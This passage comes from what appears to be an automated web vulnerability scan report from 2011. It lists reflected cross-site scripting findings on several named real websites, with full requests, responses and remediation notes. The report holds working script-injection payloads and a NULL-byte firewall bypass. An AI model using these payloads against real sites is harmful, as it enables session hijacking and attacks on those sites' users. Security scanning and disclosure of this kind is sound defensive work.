HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 15:55:45 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 15:55:45 GMT Content-Length: 19629 Connection: close Set-Cookie: ARPT=VRWOZXS192.168.100.26CKOUQ; path=/ Set-Cookie: PHPSESSID=u15624i2oae1adjjrl0fa5mn65; path=/ Set-Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136 Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-enLhu7KjEvXpkJfrfAQOnZ1eEyEUcIq0WVmXir4NGwcZbmUHGK2l4Dwd73MuXjqeOUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJ6pTPd4ZzeqNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn6nygrYAfQJ-r4CTEiWPaQLH4pwjPOr-mcyYKvi6WopOasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/ Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-enLhu7KjEvXpkJfrfAQOnZ1eEyEUcIq0WVmXir4NGwcZbmUHGK2l4Dwd73MuXjqeOUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJ6pTPd4ZzeqNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn6nygrYAfQJ-r4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/ Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-enLhu7KjEvXpkJfrfAQOnZ1eEyEUcIq0WVmXir4NGwcZbmUHGK2l4Dwd73MuXjqeOUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJ6pTPd4ZzeqNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn6nygrYAfQJ-r4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/ Set-Cookie: adc=RSP; path=/;
4.498. http://www.myfinances.com/contact.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.myfinances.com
Path:
/contact.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 613cb'><script>alert(1)</script>8f2541e63ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact.html?613cb'><script>alert(1)</script>8f2541e63ae=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:02:44 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:02:44 GMT Content-Length: 8051 Connection: close Set-Cookie: adc=RSP; path=/;
4.499. http://www.openforum.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.openforum.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54350'-alert(1)-'b64566be317 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?54350'-alert(1)-'b64566be317=1 HTTP/1.1 Host: www.openforum.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Thu, 03 Feb 2011 13:50:31 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 13:50:31 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/ Set-Cookie: BIGipServerAmex=2735450304.20480.0000; path=/ Content-Length: 102188
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4b2f'-alert(1)-'731207dc1c was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?cid=inav_homea4b2f'-alert(1)-'731207dc1c&inav=menu_business_openforum HTTP/1.1 Host: www.openforum.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 SSL: True Expires: Thu, 03 Feb 2011 13:50:42 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 13:50:42 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/ Set-Cookie: BIGipServerAmex=2785781952.20480.0000; path=/ Content-Length: 102363
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the inav request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1db04'-alert(1)-'749ae354a20 was submitted in the inav parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?cid=inav_home&inav=menu_business_openforum1db04'-alert(1)-'749ae354a20 HTTP/1.1 Host: www.openforum.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 SSL: True Expires: Thu, 03 Feb 2011 13:50:48 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 13:50:48 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/ Set-Cookie: BIGipServerAmex=2819336384.20480.0000; path=/ Content-Length: 102377
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
4.502. https://www.openforum.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.openforum.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a374f'-alert(1)-'7289baab9b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?a374f'-alert(1)-'7289baab9b9=1 HTTP/1.1 Host: www.openforum.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 SSL: True Expires: Thu, 03 Feb 2011 13:50:35 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 13:50:35 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/ Set-Cookie: BIGipServerAmex=2836113600.20480.0000; path=/ Content-Length: 102556
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aac2e"%3balert(1)//8d034beed23 was submitted in the campaignId parameter. This input was echoed as aac2e";alert(1)//8d034beed23 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-listings?tsrc=SP&campaignId=SP_FT_AddEditaBusinessaac2e"%3balert(1)//8d034beed23 HTTP/1.1 Host: www.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;
Response
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:16:53 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Get Your Free Business Listing | SuperMedia.com Advertising</title>
The value of the tsrc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20b9c"%3balert(1)//623d3053168 was submitted in the tsrc parameter. This input was echoed as 20b9c";alert(1)//623d3053168 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-listings?tsrc=SP20b9c"%3balert(1)//623d3053168&campaignId=SP_FT_AddEditaBusiness HTTP/1.1 Host: www.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;
Response
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:16:48 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Get Your Free Business Listing | SuperMedia.com Advertising</title>
The value of the &tsrc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 198c8"%3balert(1)//96cb9badcf2 was submitted in the &tsrc parameter. This input was echoed as 198c8";alert(1)//96cb9badcf2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-listings/business-profile?&tsrc=SP198c8"%3balert(1)//96cb9badcf2&campaignId=BP:Update+Your+Profile+Top HTTP/1.1 Host: www.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 17:05:34 GMT Set-Cookie: JSESSIONID=B9B8A68CD261E7EEF56BA494FDEE7747.app3-a1; Path=/ Set-Cookie: trafficSource="SP198c8\";alert(1)//96cb9badcf2"; Expires=Sat, 05-Mar-2011 17:05:33 GMT; Path=/ Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 17:05:33 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en Connection: close Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Your Business Profile | SuperMedia.com Advertising</title>
The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7d7a"%3balert(1)//5f4e0e8915 was submitted in the campaignId parameter. This input was echoed as b7d7a";alert(1)//5f4e0e8915 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-listings/business-profile?&tsrc=SP&campaignId=BP:Update+Your+Profile+Topb7d7a"%3balert(1)//5f4e0e8915 HTTP/1.1 Host: www.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 17:05:45 GMT Set-Cookie: JSESSIONID=63B1953F08BCF0514CDCD4855AE3E1E8.app7-a1; Path=/ Set-Cookie: trafficSource=SP; Expires=Sat, 05-Mar-2011 17:05:41 GMT; Path=/ Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 17:05:41 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en Connection: close Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139e45525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Your Business Profile | SuperMedia.com Advertising</title>
The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00647f4"%3balert(1)//acd0e29ec22 was submitted in the campaignId parameter. This input was echoed as 647f4";alert(1)//acd0e29ec22 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /business-listings/business-profile?&tsrc=SP&campaignId=BP:Update+Your+Profile+Top%00647f4"%3balert(1)//acd0e29ec22 HTTP/1.1 Host: www.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;
Response
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:16:48 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Your Business Profile | SuperMedia.com Advertising</title>
The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f17b"%3balert(1)//351308f1023 was submitted in the campaignId parameter. This input was echoed as 6f17b";alert(1)//351308f1023 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online-advertising?tsrc=SP&campaignId=SP_FT_AdvertiseWithUs6f17b"%3balert(1)//351308f1023 HTTP/1.1 Host: www.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;
Response
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:16:33 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
The value of the tsrc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9e22"%3balert(1)//51aaefb74c6 was submitted in the tsrc parameter. This input was echoed as b9e22";alert(1)//51aaefb74c6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online-advertising?tsrc=SPb9e22"%3balert(1)//51aaefb74c6&campaingnId=SP_listing_header HTTP/1.1 Host: www.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;
Response
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:16:13 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
4.510. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superpages.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b3044--><script>alert(1)</script>9a336ccd25a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?b3044--><script>alert(1)</script>9a336ccd25a=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:07:20 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:20 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head ...[SNIP]... <a href="?SRC=&b3044--><script>alert(1)</script>9a336ccd25a=1#" rel="nofollow"> ...[SNIP]...
4.511. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superpages.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab2fa"><script>alert(1)</script>887ac555049 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?ab2fa"><script>alert(1)</script>887ac555049=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:07:12 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:14 GMT;path=/
4.512. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superpages.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c040f'-alert(1)-'b2565b0ba7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?c040f'-alert(1)-'b2565b0ba7=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:07:16 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:16 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head ...[SNIP]... <a HREF="http://mapserver.superpages.com/mapbasedsearch/?spheader=true&L='+L_encoded+'&SRC=&c040f'-alert(1)-'b2565b0ba7=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce45f"-alert(1)-"161ba1e0a00 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/Facebookce45f"-alert(1)-"161ba1e0a00 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: JSESSIONID=F81968BB9B8C6E79A245B67095187467; Path=/ Set-Cookie: web=; Domain=.superpages.com; Path=/ Set-Cookie: shopping=; Domain=.superpages.com; Path=/ Set-Cookie: yp=; Domain=.superpages.com; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 57268 Date: Thu, 03 Feb 2011 17:06:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <script language="JavaScript" type="text/javascript"> document.cookie="OpenPhones="; </script> <h ...[SNIP]... ellowpages.superpages.com'; var var_account = 'Superpagescom'; var hostServ = 'http://www.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://www.superpages.com/bp/Facebookce45f"-alert(1)-"161ba1e0a00?="; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of the PGID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e44e9"-alert(1)-"ac1eec3d3bf was submitted in the PGID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855e44e9"-alert(1)-"ac1eec3d3bf&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
